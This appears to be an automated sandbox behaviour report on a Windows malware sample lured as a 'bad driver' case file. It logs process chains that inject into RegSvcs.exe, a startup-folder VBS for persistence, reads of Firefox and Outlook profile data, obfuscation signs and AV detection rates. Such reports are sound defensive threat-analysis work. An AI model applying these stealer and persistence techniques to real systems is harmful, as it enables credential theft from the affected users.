Source: unknown Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\name.vbs"
Source: Case_Your company bad driver Vehicle No.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe File read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini Jump to behavior
Source: C:\Users\user\Desktop\Case_Your company bad driver Vehicle No.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: Case_Your company bad driver Vehicle No.exe Virustotal: Detection: 67%
Source: Case_Your company bad driver Vehicle No.exe ReversingLabs: Detection: 60%
Source: C:\Users\user\Desktop\Case_Your company bad driver Vehicle No.exe File read: C:\Users\user\Desktop\Case_Your company bad driver Vehicle No.exe Jump to behavior
Source: unknown Process created: C:\Users\user\Desktop\Case_Your company bad driver Vehicle No.exe "C:\Users\user\Desktop\Case_Your company bad driver Vehicle No.exe"
Source: C:\Users\user\Desktop\Case_Your company bad driver Vehicle No.exe Process created: C:\Users\user\AppData\Local\directory\name.exe "C:\Users\user\Desktop\Case_Your company bad driver Vehicle No.exe"
Source: C:\Users\user\AppData\Local\directory\name.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\Desktop\Case_Your company bad driver Vehicle No.exe"
Source: C:\Users\user\AppData\Local\directory\name.exe Process created: C:\Users\user\AppData\Local\directory\name.exe "C:\Users\user\AppData\Local\directory\name.exe"
Source: C:\Users\user\AppData\Local\directory\name.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\AppData\Local\directory\name.exe"
Source: unknown Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\name.vbs"
Source: C:\Windows\System32\wscript.exe Process created: C:\Users\user\AppData\Local\directory\name.exe "C:\Users\user\AppData\Local\directory\name.exe"
Source: C:\Users\user\AppData\Local\directory\name.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\AppData\Local\directory\name.exe"
Source: C:\Users\user\Desktop\Case_Your company bad driver Vehicle No.exe Process created: C:\Users\user\AppData\Local\directory\name.exe "C:\Users\user\Desktop\Case_Your company bad driver Vehicle No.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\directory\name.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\Desktop\Case_Your company bad driver Vehicle No.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\directory\name.exe Process created: C:\Users\user\AppData\Local\directory\name.exe "C:\Users\user\AppData\Local\directory\name.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\directory\name.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\AppData\Local\directory\name.exe" Jump to behavior
Source: C:\Windows\System32\wscript.exe Process created: C:\Users\user\AppData\Local\directory\name.exe "C:\Users\user\AppData\Local\directory\name.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\directory\name.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\AppData\Local\directory\name.exe" Jump to behavior
Source: C:\Users\user\Desktop\Case_Your company bad driver Vehicle No.exe Section loaded: wsock32.dll Jump to behavior
Source: C:\Users\user\Desktop\Case_Your company bad driver Vehicle No.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\Desktop\Case_Your company bad driver Vehicle No.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\Desktop\Case_Your company bad driver Vehicle No.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Users\user\Desktop\Case_Your company bad driver Vehicle No.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\Desktop\Case_Your company bad driver Vehicle No.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\Desktop\Case_Your company bad driver Vehicle No.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\Desktop\Case_Your company bad driver Vehicle No.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\Desktop\Case_Your company bad driver Vehicle No.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\Desktop\Case_Your company bad driver Vehicle No.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\Desktop\Case_Your company bad driver Vehicle No.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\Desktop\Case_Your company bad driver Vehicle No.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Users\user\Desktop\Case_Your company bad driver Vehicle No.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Users\user\Desktop\Case_Your company bad driver Vehicle No.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Users\user\Desktop\Case_Your company bad driver Vehicle No.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\Desktop\Case_Your company bad driver Vehicle No.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\directory\name.exe Section loaded: wsock32.dll Jump to behavior
Source: C:\Users\user\AppData\Local\directory\name.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\AppData\Local\directory\name.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\AppData\Local\directory\name.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Users\user\AppData\Local\directory\name.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\AppData\Local\directory\name.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\directory\name.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\AppData\Local\directory\name.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\AppData\Local\directory\name.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\directory\name.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\AppData\Local\directory\name.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\directory\name.exe Section loaded: wsock32.dll Jump to behavior
Source: C:\Users\user\AppData\Local\directory\name.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\AppData\Local\directory\name.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\AppData\Local\directory\name.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Users\user\AppData\Local\directory\name.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\AppData\Local\directory\name.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\directory\name.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\AppData\Local\directory\name.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\AppData\Local\directory\name.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\directory\name.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\AppData\Local\directory\name.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: sxs.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: vbscript.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: msisip.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: wshext.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: scrobj.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: mlang.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: scrrun.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: slc.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Users\user\AppData\Local\directory\name.exe Section loaded: wsock32.dll Jump to behavior
Source: C:\Users\user\AppData\Local\directory\name.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\AppData\Local\directory\name.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\AppData\Local\directory\name.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Users\user\AppData\Local\directory\name.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\AppData\Local\directory\name.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\directory\name.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\AppData\Local\directory\name.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\AppData\Local\directory\name.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\directory\name.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\AppData\Local\directory\name.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\directory\name.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\11.0\Outlook\Profiles Jump to behavior
Source: Case_Your company bad driver Vehicle No.exe Static file information: File size 1172480 > 1048576
Source: Case_Your company bad driver Vehicle No.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: Case_Your company bad driver Vehicle No.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: Case_Your company bad driver Vehicle No.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: Case_Your company bad driver Vehicle No.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Case_Your company bad driver Vehicle No.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: Case_Your company bad driver Vehicle No.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
Source: Case_Your company bad driver Vehicle No.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: _.pdb source: RegSvcs.exe, 0000000B.00000002.3478077990.00000000051D0000.00000004.08000000.00040000.00000000.sdmp, RegSvcs.exe, 0000000B.00000002.3477412077.0000000003CCD000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000B.00000002.3451674428.00000000029B0000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000F.00000002.3841331858.0000000002E20000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000F.00000002.3845657517.00000000042D5000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: wntdll.pdbUGP source: name.exe, 00000008.00000003.3296361938.00000000039D0000.00000004.00001000.00020000.00000000.sdmp, name.exe, 00000008.00000003.3296658216.0000000003830000.00000004.00001000.00020000.00000000.sdmp, name.exe, 0000000A.00000003.3328159917.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, name.exe, 0000000A.00000003.3328274117.0000000003950000.00000004.00001000.00020000.00000000.sdmp, name.exe, 0000000E.00000003.3446492753.0000000004200000.00000004.00001000.00020000.00000000.sdmp, name.exe, 0000000E.00000003.3446375928.0000000004060000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb source: name.exe, 00000008.00000003.3296361938.00000000039D0000.00000004.00001000.00020000.00000000.sdmp, name.exe, 00000008.00000003.3296658216.0000000003830000.00000004.00001000.00020000.00000000.sdmp, name.exe, 0000000A.00000003.3328159917.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, name.exe, 0000000A.00000003.3328274117.0000000003950000.00000004.00001000.00020000.00000000.sdmp, name.exe, 0000000E.00000003.3446492753.0000000004200000.00000004.00001000.00020000.00000000.sdmp, name.exe, 0000000E.00000003.3446375928.0000000004060000.00000004.00001000.00020000.00000000.sdmp
Source: Case_Your company bad driver Vehicle No.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: Case_Your company bad driver Vehicle No.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: Case_Your company bad driver Vehicle No.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: Case_Your company bad driver Vehicle No.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: Case_Your company bad driver Vehicle No.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Data Obfuscation
barindex
.NET source code contains method to dynamically call methods (often used by packers)
Source: 11.2.RegSvcs.exe.5490000.6.raw.unpack, WP6RZJql8gZrNhVA9v.cs .Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
Source: 11.2.RegSvcs.exe.51d0ee8.5.raw.unpack, WP6RZJql8gZrNhVA9v.cs .Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
Source: 11.2.RegSvcs.exe.29f1046.2.raw.unpack, WP6RZJql8gZrNhVA9v.cs .Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
Source: 11.2.RegSvcs.exe.3d05d90.3.raw.unpack, WP6RZJql8gZrNhVA9v.cs .Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
Contains functionality to dynamically determine API calls
Source: C:\Users\user\Desktop\Case_Your company bad driver Vehicle No.exe Code function: 0_2_00C2C304 LoadLibraryA,GetProcAddress, 0_2_00C2C304
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\Desktop\Case_Your company bad driver Vehicle No.exe Code function: 0_2_00BD8B85 push ecx; ret 0_2_00BD8B98
Source: C:\Users\user\AppData\Local\directory\name.exe Code function: 8_2_009E8B85 push ecx; ret 8_2_009E8B98
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 11_2_0041C40C push cs; iretd 11_2_0041C4E2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 11_2_00423149 push eax; ret 11_2_00423179
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 11_2_0041C50E push cs; iretd 11_2_0041C4E2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 11_2_004231C8 push eax; ret 11_2_00423179
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 11_2_0040E21D push ecx; ret 11_2_0040E230
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 11_2_0041C6BE push ebx; ret 11_2_0041C6BF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 11_2_02AB1E80 push edx; retf 11_2_02AB1E82
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 11_2_02AB462A push edx; retf 11_2_02AB462C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 11_2_02AB6604 push edx; retf 11_2_02AB6614
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 11_2_02AB5F8A push edx; retf 11_2_02AB5F8B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 11_2_02AB57F1 push edx; retf 11_2_02AB57FB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 11_2_02AB2722 push edx; retf 11_2_02AB2723
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 11_2_02AB4316 pushfd ; iretd 11_2_02AB4319
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 11_2_02AB4758 push edx; retf 11_2_02AB4763
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 11_2_02AB34BB push edx; retf 11_2_02AB34BD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 11_2_02AB44B8 push edx; retf 11_2_02AB44BA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 11_2_02AB283B push edx; retf 11_2_02AB283C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 11_2_02AB4800 push edx; retf 11_2_02AB4802
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 11_2_02AB393E push edx; retf 11_2_02AB3940
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 11_2_05A2E470 push eax; iretd 11_2_05A2E471
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 11_2_05A25F99 push 8BFFFFF8h; ret 11_2_05A25F9F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 11_2_05A25A62 push 8BFFFFF7h; ret 11_2_05A25A68
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 11_2_063C8718 push esp; retf 11_2_063C8721
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 11_2_063CDF60 push ecx; retf 11_2_063CDF62
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 15_2_02D34758 push edx; retf 15_2_02D34763
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 15_2_02D34316 pushfd ; iretd 15_2_02D34319
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 15_2_03256399 push 8BFFFFF8h; ret 15_2_0325639F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 15_2_03255E62 push 8BFFFFF7h; ret 15_2_03255E68
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 15_2_0325E470 push eax; iretd 15_2_0325E471
Source: 11.2.RegSvcs.exe.5490000.6.raw.unpack, WP6RZJql8gZrNhVA9v.cs High entropy of concatenated method names: 'G9skPDgcXb', 'KDikMXewCI', 'B2XkaLi4dH', 'hx5kqNgSj4', 'TVtkAMaqpL', 'VDqkQKyKML', 'h4HAryPEN2L0t', 'ab9oDe4UH3', 'TAOohhiP7R', 'zDKosecjaB'
Source: 11.2.RegSvcs.exe.51d0ee8.5.raw.unpack, WP6RZJql8gZrNhVA9v.cs High entropy of concatenated method names: 'G9skPDgcXb', 'KDikMXewCI', 'B2XkaLi4dH', 'hx5kqNgSj4', 'TVtkAMaqpL', 'VDqkQKyKML', 'h4HAryPEN2L0t', 'ab9oDe4UH3', 'TAOohhiP7R', 'zDKosecjaB'
Source: 11.2.RegSvcs.exe.29f1046.2.raw.unpack, WP6RZJql8gZrNhVA9v.cs High entropy of concatenated method names: 'G9skPDgcXb', 'KDikMXewCI', 'B2XkaLi4dH', 'hx5kqNgSj4', 'TVtkAMaqpL', 'VDqkQKyKML', 'h4HAryPEN2L0t', 'ab9oDe4UH3', 'TAOohhiP7R', 'zDKosecjaB'
Source: 11.2.RegSvcs.exe.3d05d90.3.raw.unpack, WP6RZJql8gZrNhVA9v.cs High entropy of concatenated method names: 'G9skPDgcXb', 'KDikMXewCI', 'B2XkaLi4dH', 'hx5kqNgSj4', 'TVtkAMaqpL', 'VDqkQKyKML', 'h4HAryPEN2L0t', 'ab9oDe4UH3', 'TAOohhiP7R', 'zDKosecjaB'
Creates processes with suspicious names
Source: C:\Users\user\Desktop\Case_Your company bad driver Vehicle No.exe File created: \case_your company bad driver vehicle no.exe
Source: C:\Users\user\Desktop\Case_Your company bad driver Vehicle No.exe File created: \case_your company bad driver vehicle no.exe Jump to behavior
Drops PE files
Source: C:\Users\user\Desktop\Case_Your company bad driver Vehicle No.exe File created: C:\Users\user\AppData\Local\directory\name.exe Jump to dropped file

Boot Survival
barindex
Drops VBS files to the startup folder
Source: C:\Users\user\AppData\Local\directory\name.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\name.vbs Jump to dropped file
Creates a start menu entry (Start Menu\Programs\Startup)
Source: C:\Users\user\AppData\Local\directory\name.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\name.vbs Jump to behavior
Stores files to the Windows start menu directory
Source: C:\Users\user\AppData\Local\directory\name.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\name.vbs Jump to behavior

Hooking and other Techniques for Hiding and Protection
barindex
Icon mismatch, binary includes an icon from a different legit application in order to fool users
Source: initial sample Icon embedded in binary file: icon matches a legit application icon: adobe 12.png
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Source: C:\Users\user\Desktop\Case_Your company bad driver Vehicle No.exe Code function: 0_2_00BB4A35 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput, 0_2_00BB4A35
Source: C:\Users\user\Desktop\Case_Your company bad driver Vehicle No.exe Code function: 0_2_00C355FD IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed, 0_2_00C355FD
Source: C:\Users\user\AppData\Local\directory\name.exe Code function: 8_2_009C4A35 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput, 8_2_009C4A35
Source: C:\Users\user\AppData\Local\directory\name.exe Code function: 8_2_00A455FD IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed, 8_2_00A455FD
Extensive use of GetProcAddress (often used to hide API calls)
Source: C:\Users\user\Desktop\Case_Your company bad driver Vehicle No.exe Code function: 0_2_00BD33C7 EncodePointer,__initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 0_2_00BD33C7
Source: C:\Users\user\Desktop\Case_Your company bad driver Vehicle No.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Case_Your company bad driver Vehicle No.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\directory\name.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\directory\name.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\directory\name.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\directory\name.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
